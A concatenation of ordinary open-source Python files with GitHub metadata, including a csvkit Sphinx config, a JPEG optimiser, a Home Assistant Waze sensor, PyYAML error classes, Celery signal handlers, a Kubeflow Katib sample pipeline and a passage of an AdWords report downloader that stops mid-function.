# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'csvkitdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'csvkit.tex', u'csvkit Documentation',
u'Christopher Groskopf', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
# ('scripts/csvcut', 'csvcut', u'csvcut Documentation',
# [u'Christopher Groskopf'], 1),
]
for filename in os.listdir('scripts'):
name = os.path.splitext(filename)[0]
man_pages.append((
os.path.join('scripts', name),
name,
'%s Documentation' % name,
[u'Christopher Groskopf'],
1
))
|
{
"content_hash": "2324e265e64ef42825a069dde8749b37",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 80,
"avg_line_length": 31.98173515981735,
"alnum_prop": 0.700028555111365,
"repo_name": "metasoarous/csvkit",
"id": "db470f8c55414a10cc00b96d6137c82df8ddb7ab",
"size": "7421",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Prolog",
"bytes": "501000"
},
{
"name": "Python",
"bytes": "212491"
}
],
"symlink_target": ""
}
|
import os.path
from optimiser.optimiser import Optimiser
import logging
class OptimiseJPG(Optimiser):
"""
Optimises jpegs with jpegtran (part of libjpeg)
"""
def __init__(self, **kwargs):
super(OptimiseJPG, self).__init__(**kwargs)
strip_jpg_meta = kwargs.pop('strip_jpg_meta')
# the command to execute this optimiser
if strip_jpg_meta:
self.commands = ('jpegtran -outfile "__OUTPUT__" -optimise -copy none "__INPUT__"',
'jpegtran -outfile "__OUTPUT__" -optimise -progressive "__INPUT__"')
else:
self.commands = ('jpegtran -outfile "__OUTPUT__" -optimise -copy all "__INPUT__"',
'jpegtran -outfile "__OUTPUT__" -optimise -progressive -copy all "__INPUT__"')
# format as returned by 'identify'
self.format = "JPEG"
def _get_command(self):
"""
Returns the next command to apply
"""
# for the first iteration, return the first command
if self.iterations == 0:
self.iterations += 1
return self.commands[0]
elif self.iterations == 1:
self.iterations += 1
# for the next one, only return the second command if file size > 10kb
if os.path.getsize(self.input) > 10000:
if self.quiet == False:
logging.warning("File is > 10kb - will be converted to progressive")
return self.commands[1]
return False
|
{
"content_hash": "e42d14ebfe7d02841377cf96e74061a6",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 95,
"avg_line_length": 33.888888888888886,
"alnum_prop": 0.5580327868852459,
"repo_name": "thebeansgroup/smush.py",
"id": "3334a5bd3297e3803152d0313523f09a086dc447",
"size": "1525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smush/optimiser/formats/jpg.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25738"
}
],
"symlink_target": ""
}
|
"""
Support for Waze travel time sensor.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.waze_travel_time/
"""
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION, CONF_NAME, CONF_REGION, EVENT_HOMEASSISTANT_START,
ATTR_LATITUDE, ATTR_LONGITUDE)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import location
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['WazeRouteCalculator==0.6']
_LOGGER = logging.getLogger(__name__)
ATTR_DURATION = 'duration'
ATTR_DISTANCE = 'distance'
ATTR_ROUTE = 'route'
CONF_ATTRIBUTION = "Data provided by the Waze.com"
CONF_DESTINATION = 'destination'
CONF_ORIGIN = 'origin'
CONF_INCL_FILTER = 'incl_filter'
CONF_EXCL_FILTER = 'excl_filter'
CONF_REALTIME = 'realtime'
DEFAULT_NAME = 'Waze Travel Time'
DEFAULT_REALTIME = True
ICON = 'mdi:car'
REGIONS = ['US', 'NA', 'EU', 'IL']
SCAN_INTERVAL = timedelta(minutes=5)
TRACKABLE_DOMAINS = ['device_tracker', 'sensor', 'zone']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_ORIGIN): cv.string,
vol.Required(CONF_DESTINATION): cv.string,
vol.Required(CONF_REGION): vol.In(REGIONS),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_INCL_FILTER): cv.string,
vol.Optional(CONF_EXCL_FILTER): cv.string,
vol.Optional(CONF_REALTIME, default=DEFAULT_REALTIME): cv.boolean,
})
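# Illustrative only (not used anywhere in this platform): after PLATFORM_SCHEMA
# validation the mapping handed to setup_platform() would look roughly like the
# dict below; the origin/destination/region values are made-up examples.
_EXAMPLE_VALIDATED_CONFIG = {
    CONF_ORIGIN: 'device_tracker.paulus',
    CONF_DESTINATION: 'zone.home',
    CONF_REGION: 'US',
    CONF_NAME: DEFAULT_NAME,
    CONF_REALTIME: DEFAULT_REALTIME,
}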
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Waze travel time sensor platform."""
destination = config.get(CONF_DESTINATION)
name = config.get(CONF_NAME)
origin = config.get(CONF_ORIGIN)
region = config.get(CONF_REGION)
incl_filter = config.get(CONF_INCL_FILTER)
excl_filter = config.get(CONF_EXCL_FILTER)
realtime = config.get(CONF_REALTIME)
sensor = WazeTravelTime(name, origin, destination, region,
incl_filter, excl_filter, realtime)
add_entities([sensor])
# Wait until start event is sent to load this component.
hass.bus.listen_once(
EVENT_HOMEASSISTANT_START, lambda _: sensor.update())
def _get_location_from_attributes(state):
"""Get the lat/long string from an states attributes."""
attr = state.attributes
return '{},{}'.format(attr.get(ATTR_LATITUDE), attr.get(ATTR_LONGITUDE))
class WazeTravelTime(Entity):
"""Representation of a Waze travel time sensor."""
def __init__(self, name, origin, destination, region,
incl_filter, excl_filter, realtime):
"""Initialize the Waze travel time sensor."""
self._name = name
self._region = region
self._incl_filter = incl_filter
self._excl_filter = excl_filter
self._realtime = realtime
self._state = None
self._origin_entity_id = None
self._destination_entity_id = None
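        # If origin/destination look like entity ids from a trackable domain
        # (device_tracker, sensor or zone), remember the entity id and resolve
        # its location on every update; otherwise treat the value as a literal
        # address or "lat,lon" string.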
if origin.split('.', 1)[0] in TRACKABLE_DOMAINS:
self._origin_entity_id = origin
else:
self._origin = origin
if destination.split('.', 1)[0] in TRACKABLE_DOMAINS:
self._destination_entity_id = destination
else:
self._destination = destination
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
if self._state is None:
return None
if 'duration' in self._state:
return round(self._state['duration'])
return None
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return 'min'
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return ICON
@property
def device_state_attributes(self):
"""Return the state attributes of the last update."""
if self._state is None:
return None
res = {ATTR_ATTRIBUTION: CONF_ATTRIBUTION}
if 'duration' in self._state:
res[ATTR_DURATION] = self._state['duration']
if 'distance' in self._state:
res[ATTR_DISTANCE] = self._state['distance']
if 'route' in self._state:
res[ATTR_ROUTE] = self._state['route']
return res
def _get_location_from_entity(self, entity_id):
"""Get the location from the entity_id."""
state = self.hass.states.get(entity_id)
if state is None:
_LOGGER.error("Unable to find entity %s", entity_id)
return None
# Check if the entity has location attributes (zone)
if location.has_location(state):
return _get_location_from_attributes(state)
# Check if device is in a zone (device_tracker)
zone_state = self.hass.states.get('zone.{}'.format(state.state))
if location.has_location(zone_state):
_LOGGER.debug(
"%s is in %s, getting zone location",
entity_id, zone_state.entity_id
)
return _get_location_from_attributes(zone_state)
# If zone was not found in state then use the state as the location
if entity_id.startswith('sensor.'):
return state.state
# When everything fails just return nothing
return None
def _resolve_zone(self, friendly_name):
"""Get a lat/long from a zones friendly_name."""
states = self.hass.states.all()
for state in states:
if state.domain == 'zone' and state.name == friendly_name:
return _get_location_from_attributes(state)
return friendly_name
def update(self):
"""Fetch new state data for the sensor."""
import WazeRouteCalculator
if self._origin_entity_id is not None:
self._origin = self._get_location_from_entity(
self._origin_entity_id)
if self._destination_entity_id is not None:
self._destination = self._get_location_from_entity(
self._destination_entity_id)
self._destination = self._resolve_zone(self._destination)
self._origin = self._resolve_zone(self._origin)
if self._destination is not None and self._origin is not None:
try:
params = WazeRouteCalculator.WazeRouteCalculator(
self._origin, self._destination, self._region)
routes = params.calc_all_routes_info(real_time=self._realtime)
if self._incl_filter is not None:
routes = {k: v for k, v in routes.items() if
self._incl_filter.lower() in k.lower()}
if self._excl_filter is not None:
routes = {k: v for k, v in routes.items() if
self._excl_filter.lower() not in k.lower()}
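                # routes maps route name -> (duration, distance); pick the
                # route with the shortest duration.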
route = sorted(routes, key=(lambda key: routes[key][0]))[0]
duration, distance = routes[route]
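                # The route name comes back as UTF-8 bytes mis-decoded as
                # Latin-1; round-trip it to recover the intended characters.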
route = bytes(route, 'ISO-8859-1').decode('UTF-8')
self._state = {
'duration': duration,
'distance': distance,
'route': route,
}
except WazeRouteCalculator.WRCError as exp:
_LOGGER.error("Error on retrieving data: %s", exp)
return
except KeyError:
_LOGGER.error("Error retrieving data from server")
return
|
{
"content_hash": "a126a60af574e24966b2b9a03dbc80c5",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 78,
"avg_line_length": 33.82378854625551,
"alnum_prop": 0.6100547017452461,
"repo_name": "persandstrom/home-assistant",
"id": "e4cc8381edee157065a6fa257c9344803bda83cf",
"size": "7678",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "homeassistant/components/sensor/waze_travel_time.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1067"
},
{
"name": "Python",
"bytes": "11745210"
},
{
"name": "Ruby",
"bytes": "518"
},
{
"name": "Shell",
"bytes": "16652"
}
],
"symlink_target": ""
}
|
__all__ = ['Mark', 'YAMLError', 'MarkedYAMLError']
class Mark(object):
def __init__(self, name, index, line, column, buffer, pointer):
self.name = name
self.index = index
self.line = line
self.column = column
self.buffer = buffer
self.pointer = pointer
def get_snippet(self, indent=4, max_length=75):
if self.buffer is None:
return None
head = ''
start = self.pointer
while start > 0 and self.buffer[start-1] not in u'\0\r\n\x85\u2028\u2029':
start -= 1
if self.pointer-start > max_length/2-1:
head = ' ... '
start += 5
break
tail = ''
end = self.pointer
while end < len(self.buffer) and self.buffer[end] not in u'\0\r\n\x85\u2028\u2029':
end += 1
if end-self.pointer > max_length/2-1:
tail = ' ... '
end -= 5
break
snippet = self.buffer[start:end].encode('utf-8')
return ' '*indent + head + snippet + tail + '\n' \
+ ' '*(indent+self.pointer-start+len(head)) + '^'
def __str__(self):
snippet = self.get_snippet()
where = " in \"%s\", line %d, column %d" \
% (self.name, self.line+1, self.column+1)
if snippet is not None:
where += ":\n"+snippet
return where
class YAMLError(Exception):
pass
class MarkedYAMLError(YAMLError):
def __init__(self, context=None, context_mark=None,
problem=None, problem_mark=None, note=None):
self.context = context
self.context_mark = context_mark
self.problem = problem
self.problem_mark = problem_mark
self.note = note
def __str__(self):
lines = []
if self.context is not None:
lines.append(self.context)
if self.context_mark is not None \
and (self.problem is None or self.problem_mark is None
or self.context_mark.name != self.problem_mark.name
or self.context_mark.line != self.problem_mark.line
or self.context_mark.column != self.problem_mark.column):
lines.append(str(self.context_mark))
if self.problem is not None:
lines.append(self.problem)
if self.problem_mark is not None:
lines.append(str(self.problem_mark))
if self.note is not None:
lines.append(self.note)
return '\n'.join(lines)
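# Hedged usage sketch (illustrative only, not part of the original module;
# written for the Python 2 runtime this file targets): build a Mark over a
# small in-memory buffer and render the caret snippet the same way
# MarkedYAMLError.__str__ would.
def _example_mark_snippet():
    buf = u'key: [1, 2\n'
    mark = Mark('<example>', 0, 0, 10, buf, 10)
    return mark.get_snippet(indent=4)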
|
{
"content_hash": "fcebfc0a75766b2d5c345c95af267a0b",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 91,
"avg_line_length": 34.567567567567565,
"alnum_prop": 0.5304925723221267,
"repo_name": "Sorsly/subtle",
"id": "bfb99f226611739bae5bb6665db782c61f3064ad",
"size": "2581",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "google-cloud-sdk/platform/bq/third_party/yaml/error.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1581"
},
{
"name": "CSS",
"bytes": "226"
},
{
"name": "HTML",
"bytes": "4637"
},
{
"name": "JavaScript",
"bytes": "3037"
},
{
"name": "PHP",
"bytes": "4543"
},
{
"name": "Pascal",
"bytes": "31"
},
{
"name": "Python",
"bytes": "13243860"
},
{
"name": "Roff",
"bytes": "1050600"
},
{
"name": "Shell",
"bytes": "16136"
},
{
"name": "Smarty",
"bytes": "2484"
},
{
"name": "SourcePawn",
"bytes": "308"
}
],
"symlink_target": ""
}
|
import os
import traceback
from builtins import str
from celery.signals import after_task_publish
from celery.signals import task_failure
from celery.signals import task_success
from celery.utils.log import get_task_logger
from django.core.exceptions import ObjectDoesNotExist
from contentcuration.models import Task
# because Celery connects signals upon import, we don't want to put signals into other modules that may be
# imported multiple times. Instead, we follow the advice here and use AppConfig.init to import the module:
# https://stackoverflow.com/questions/7115097/the-right-place-to-keep-my-signals-py-file-in-a-django-project/21612050#21612050
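# A minimal sketch of that AppConfig hook (illustrative only; the app label,
# class name and import path below are assumptions, not necessarily what this
# project ships):
from django.apps import AppConfig
class _ExampleContentConfig(AppConfig):
    name = 'contentcuration'
    def ready(self):
        # Importing the signals module here is what connects the handlers.
        import contentcuration.utils.celery_signals  # noqa: F401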
logger = get_task_logger(__name__)
@after_task_publish.connect
def before_start(sender, headers, body, **kwargs):
"""
    Set the Task object's status to PENDING before the task actually
    starts; the after_task_publish signal indicates that the task has
    been sent to the broker.
"""
task_id = headers["id"]
try:
task = Task.objects.get(task_id=task_id)
task.status = "PENDING"
task.save()
logger.info("Task object {} updated with status PENDING.".format(task_id))
except ObjectDoesNotExist:
# If the object doesn't exist, that likely means the task was created outside of create_async_task
pass
@task_failure.connect
def on_failure(sender, **kwargs):
try:
task = Task.objects.get(task_id=sender.request.id)
task.status = "FAILURE"
task_args = []
task_kwargs = []
        # arg values may be objects, so we need to convert them to string representations for JSON serialization.
for arg in kwargs['args']:
task_args.append(str(arg))
for kwarg in kwargs['kwargs']:
task_kwargs.append(str(kwarg))
exception_data = {
'task_args': task_args,
'task_kwargs': task_kwargs,
'traceback': traceback.format_tb(kwargs['traceback'])
}
if 'error' not in task.metadata:
task.metadata['error'] = {}
task.metadata['error'].update(exception_data)
task.save()
except ObjectDoesNotExist:
pass # If the object doesn't exist, that likely means the task was created outside of create_async_task
@task_success.connect
def on_success(sender, result, **kwargs):
try:
logger.info("on_success called, process is {}".format(os.getpid()))
task_id = sender.request.id
task = Task.objects.get(task_id=task_id)
task.status = "SUCCESS"
task.metadata['result'] = result
# We're finished, so go ahead and record 100% progress so that getters expecting it get a value
# even though there is no longer a Celery task to query.
if task.is_progress_tracking:
task.metadata['progress'] = 100
task.save()
logger.info("Task with ID {} succeeded".format(task_id))
except ObjectDoesNotExist:
pass # If the object doesn't exist, that likely means the task was created outside of create_async_task
|
{
"content_hash": "fcb1c928d61eb7f87f785a2c0470f252",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 126,
"avg_line_length": 37.97560975609756,
"alnum_prop": 0.6711624919717405,
"repo_name": "DXCanas/content-curation",
"id": "8e3021b71c39d9ee303982b96f44fd8e9fd48c84",
"size": "3114",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "contentcuration/contentcuration/utils/celery_signals.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "173955"
},
{
"name": "Dockerfile",
"bytes": "2215"
},
{
"name": "HTML",
"bytes": "503467"
},
{
"name": "JavaScript",
"bytes": "601189"
},
{
"name": "Makefile",
"bytes": "3409"
},
{
"name": "Python",
"bytes": "813881"
},
{
"name": "Shell",
"bytes": "6970"
},
{
"name": "Smarty",
"bytes": "6584"
},
{
"name": "Vue",
"bytes": "21539"
}
],
"symlink_target": ""
}
|
import time
import requests
# Poll until an HTTP request succeeds, i.e. until an internet connection is
# available; without the except clause the script would crash with a
# ConnectionError while still offline instead of waiting and retrying.
while True:
    try:
        req = requests.get('http://www.google.de')
    except requests.exceptions.ConnectionError:
        time.sleep(5)
        continue
    if req.status_code == 200:
        print('**********************************')
        print('* Internet Connection available. *')
        print('**********************************')
        break
|
{
"content_hash": "208123e14847c666ebf06f3ef997a2ef",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 45,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.47560975609756095,
"repo_name": "jack6347/tools",
"id": "37c1bad1b7b8f4fc361f028819b19c87b47a7b2d",
"size": "246",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "check_internet_connection.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3387"
}
],
"symlink_target": ""
}
|
from CoreFoundation import CFPreferencesCopyAppValue
factoid = "software_update_server"
def fact():
"""Returns the software update server"""
sus = "None"
sus = CFPreferencesCopyAppValue(
"CatalogURL", "/Library/Preferences/com.apple.SoftwareUpdate.plist"
)
return {factoid: str(sus)}
if __name__ == "__main__":
print("<result>%s</result>" % fact()[factoid])
|
{
"content_hash": "bc90354e6158720c23a97e90d9c58e28",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 75,
"avg_line_length": 22.055555555555557,
"alnum_prop": 0.6574307304785895,
"repo_name": "chilcote/unearth",
"id": "8dbf8eb75d44648ca3781dc4859b9f441f0d69db",
"size": "397",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artifacts/software_update_server.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "79926"
},
{
"name": "Shell",
"bytes": "41"
}
],
"symlink_target": ""
}
|
import json
from kfp import components
import kfp.dsl as dsl
@dsl.pipeline(
name="Launch katib experiment",
description="An example to launch katib experiment."
)
def mnist_hpo(
name="mnist",
namespace="kubeflow",
goal=0.99,
parallelTrialCount=3,
maxTrialCount=12,
experimentTimeoutMinutes=60,
deleteAfterDone=True):
objectiveConfig = {
"type": "maximize",
"goal": goal,
"objectiveMetricName": "Validation-accuracy",
"additionalMetricNames": ["accuracy"]
}
algorithmConfig = {"algorithmName" : "random"}
parameters = [
{"name": "--lr", "parameterType": "double", "feasibleSpace": {"min": "0.01","max": "0.03"}},
{"name": "--num-layers", "parameterType": "int", "feasibleSpace": {"min": "2", "max": "5"}},
{"name": "--optimizer", "parameterType": "categorical", "feasibleSpace": {"list": ["sgd", "adam", "ftrl"]}}
]
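    # Each Katib trial is materialized from this raw Kubernetes Job manifest;
    # {{.Trial}}, {{.NameSpace}} and {{.HyperParameters}} are placeholders
    # filled in by Katib's Go-template engine (see trialTemplate below).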
rawTemplate = {
"apiVersion": "batch/v1",
"kind": "Job",
"metadata": {
"name": "{{.Trial}}",
"namespace": "{{.NameSpace}}"
},
"spec": {
"template": {
"spec": {
"restartPolicy": "Never",
"containers": [
{"name": "{{.Trial}}",
"image": "docker.io/katib/mxnet-mnist-example",
"command": [
"python /mxnet/example/image-classification/train_mnist.py --batch-size=64 {{- with .HyperParameters}} {{- range .}} {{.Name}}={{.Value}} {{- end}} {{- end}}"
]
}
]
}
}
}
}
trialTemplate = {
"goTemplate": {
"rawTemplate": json.dumps(rawTemplate)
}
}
katib_experiment_launcher_op = components.load_component_from_file("./component.yaml")
# katib_experiment_launcher_op = components.load_component_from_url('https://raw.githubusercontent.com/kubeflow/pipelines/master/components/kubeflow/katib-launcher/component.yaml')
op1 = katib_experiment_launcher_op(
experiment_name=name,
experiment_namespace=namespace,
parallel_trial_count=parallelTrialCount,
max_trial_count=maxTrialCount,
objective=str(objectiveConfig),
algorithm=str(algorithmConfig),
trial_template=str(trialTemplate),
parameters=str(parameters),
experiment_timeout_minutes=experimentTimeoutMinutes,
delete_finished_experiment=deleteAfterDone)
op_out = dsl.ContainerOp(
name="my-out-cop",
image="library/bash:4.4.23",
command=["sh", "-c"],
arguments=["echo hyperparameter: %s" % op1.output],
)
if __name__ == "__main__":
import kfp.compiler as compiler
compiler.Compiler().compile(mnist_hpo, __file__ + ".tar.gz")
|
{
"content_hash": "725db2d5aacec42b9caa71cb3e90bece",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 184,
"avg_line_length": 35.475,
"alnum_prop": 0.5648343904157858,
"repo_name": "kubeflow/kfp-tekton-backend",
"id": "67b79890a0e3ab688214e3974c53ca15d6dc7130",
"size": "2838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "components/kubeflow/katib-launcher/sample2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "47293"
},
{
"name": "Go",
"bytes": "1269081"
},
{
"name": "HTML",
"bytes": "3584"
},
{
"name": "JavaScript",
"bytes": "24828"
},
{
"name": "Jupyter Notebook",
"bytes": "177616"
},
{
"name": "Makefile",
"bytes": "9694"
},
{
"name": "PowerShell",
"bytes": "3194"
},
{
"name": "Python",
"bytes": "1628570"
},
{
"name": "Scala",
"bytes": "13000"
},
{
"name": "Shell",
"bytes": "180020"
},
{
"name": "Smarty",
"bytes": "7694"
},
{
"name": "Starlark",
"bytes": "76037"
},
{
"name": "TypeScript",
"bytes": "1641150"
}
],
"symlink_target": ""
}
|
"""Utility functions for working with reports."""
__author__ = 'api.kwinter@gmail.com (Kevin Winter)'
import datetime
import gzip
import re
import StringIO
import time
import urllib
import urllib2
from adspygoogle import SOAPpy
from adspygoogle.adwords import AUTH_TOKEN_EXPIRE
from adspygoogle.adwords import AUTH_TOKEN_SERVICE
from adspygoogle.adwords import LIB_SIG
from adspygoogle.adwords.AdWordsErrors import AdWordsError
from adspygoogle.adwords.AdWordsErrors import AdWordsReportError
from adspygoogle.adwords.util import XsdToWsdl
from adspygoogle.common import MessageHandler
from adspygoogle.common import SanityCheck
from adspygoogle.common import Utils
from adspygoogle.common.Errors import ValidationError
from adspygoogle.common.Logger import Logger
SERVICE_NAME = 'ReportDefinitionService'
DOWNLOAD_URL_BASE = '/api/adwords/reportdownload'
REPORT_ID = '?__rd=%s'
VERSIONED = '/%s'
ATTRIBUTES_REGEX = r'( )?[\w:-]+="[\w:\[\]-]+"'
ERROR_TYPE_REGEX = r'(?s)<type>(.*?)</type>'
ERROR_TRIGGER_REGEX = r'(?s)<trigger>(.*?)</trigger>'
ERROR_FIELD_PATH_REGEX = r'(?s)<fieldPath>(.*?)</fieldPath>'
BUF_SIZE = 4096
# We will refresh an OAuth 2.0 credential _OAUTH2_REFRESH_MINUTES_IN_ADVANCE
# minutes in advance of its expiration.
_OAUTH2_REFRESH_MINUTES_IN_ADVANCE = 5
class ReportDownloader(object):
"""Utility class that downloads reports."""
def __init__(self, headers, config, op_config, logger):
"""Inits ReportDownloader.
Args:
headers: dict Dictionary object with populated authentication
credentials.
config: dict Dictionary object with populated configuration values.
op_config: dict Dictionary object with additional configuration values for
        this operation.
      logger: Logger Logger instance used to record request and response data.
"""
self._headers = headers
self._config = config
self._op_config = op_config
self._message_handler = MessageHandler
namespace_suffix = '/'.join(('/api/adwords', op_config['group'],
self._op_config['version']))
self._namespace = 'https://adwords.google.com' + namespace_suffix
xsd_url = '%s%s%s/reportDefinition.xsd' % (op_config['server'],
'/api/adwords/reportdownload/',
self._op_config['version'])
self._soappyservice = XsdToWsdl.CreateWsdlFromXsdUrl(xsd_url)
self._logger = logger
def DownloadReport(self, report_definition_or_id, return_micros=False,
file_path=None, fileobj=None):
"""Downloads a report by object or id.
Args:
report_definition_or_id: dict or str Report or reportDefinitionId.
return_micros: bool Whether to return currency in micros (optional).
file_path: str File path to download to (optional).
fileobj: file An already-open file-like object that supports write()
(optional).
Returns:
      str Report data if neither file_path nor fileobj is given; file_path if
      file_path is given; otherwise None.
"""
if not fileobj and file_path:
fileobj = open(file_path, 'w+')
if isinstance(report_definition_or_id, dict):
return self.__DownloadAdHocReport(report_definition_or_id, return_micros,
fileobj) or file_path
else:
return self.__DownloadReportById(report_definition_or_id, return_micros,
fileobj) or file_path
def DownloadReportWithAwql(self, report_query, download_format,
return_micros=False, file_path=None, fileobj=None):
"""Downloads a report with AWQL.
Args:
report_query: str AWQL for the report.
download_format: str Download format. E.g. CSV, TSV, XML.
return_micros: bool Whether to return currency in micros (optional).
file_path: str File path to download to (optional).
fileobj: file An already-open file-like object that supports write()
(optional).
Returns:
      str Report data if neither file_path nor fileobj is given; file_path if
      file_path is given; otherwise None.
"""
if not fileobj and file_path:
fileobj = open(file_path, 'w+')
return self.__DownloadAdHocReportWithAwql(report_query,
download_format,
return_micros,
fileobj) or file_path
def __DownloadAdHocReport(self, report_definition, return_micros=False,
fileobj=None):
"""Downloads an AdHoc report.
Args:
report_definition: dict Report to download.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
report_xml = self.__GetReportXml(report_definition)
query_params = {'__rdxml': report_xml}
payload = urllib.urlencode(query_params)
return self.__DownloadReport(payload, return_micros, fileobj)
def __DownloadAdHocReportWithAwql(self,
report_query,
download_format,
return_micros=False,
fileobj=None):
"""Downloads an AdHoc report with AWQL.
Args:
report_query: str AWQL to download a report for.
download_format: str Format of the report download.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
query_params = {
'__fmt': download_format,
'__rdquery': report_query
}
payload = urllib.urlencode(query_params)
return self.__DownloadReport(payload, return_micros, fileobj)
def __DownloadReport(self, report_payload, return_micros=False, fileobj=None):
"""Downloads an AdHoc report for the specified payload.
Args:
report_payload: str Report payload to POST to the server.
return_micros: bool Whether to return currency in micros (optional).
fileobj: file File to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
url = self.__GenerateUrl()
self._CheckAuthentication()
headers = self.__GenerateHeaders(return_micros)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['Content-Length'] = str(len(report_payload))
return self.__MakeRequest(url, headers, fileobj, payload=report_payload)
def __GetReportXml(self, report):
"""Transforms the report object into xml.
Args:
report: dict ReportDefinition object to turn to xml.
Returns:
str ReportDefinition XML.
"""
SanityCheck.SoappySanityCheck(self._soappyservice, report, self._namespace,
u'reportDefinition')
packed = self._message_handler.PackForSoappy(report, self._namespace,
'reportDefinition',
self._soappyservice, False,
lambda x: '')
# Use a SOAPBuilder
builder = SOAPpy.SOAPBuilder(kw={'reportDefinition': packed}, envelope=0,
noroot=1)
# Fixes list serialization.
builder.config.typed = False
# Hack, need to remove top element and body wrapper.
builder._xml_top = ''
builder.body = 0
# Build the XML.
report_xml = builder.build()
# Removes xsi:types.
report_xml = self.__RemoveAttributes(report_xml)
return report_xml
def __RemoveAttributes(self, report_xml):
"""Removes all attributes from tags.
Args:
report_xml: str xml to remove attributes from.
Returns:
str Report xml with attributes removed.
"""
return re.sub(ATTRIBUTES_REGEX, '', report_xml).strip()
def __DownloadReportById(self, report_definition_id, return_micros=False,
fileobj=None):
"""Download report and return raw data.
Args:
report_definition_id: str Id of the report definition to download.
return_micros: bool Whether to return currency in micros.
      fileobj: file File object to write to (optional).
Returns:
str Report data if no fileobj, otherwise None.
"""
self._CheckAuthentication()
url = self.__GenerateUrl(report_definition_id)
headers = self.__GenerateHeaders(return_micros)
return self.__MakeRequest(url, headers, fileobj)
def __GenerateUrl(self, report_definition_id=None):
"""Generates the URL to get a report from.
Args:
report_definition_id: int ID of the report to download.
Returns:
str url to request
"""
url = [DOWNLOAD_URL_BASE]
url.append(VERSIONED % self._op_config['version'])
if report_definition_id:
url.append(REPORT_ID % report_definition_id)
return ''.join(url)
def __GenerateHeaders(self, return_micros):
"""Generates the headers to use for the report download.
Args:
return_micros: bool whether or not to use micros for money.
Returns:
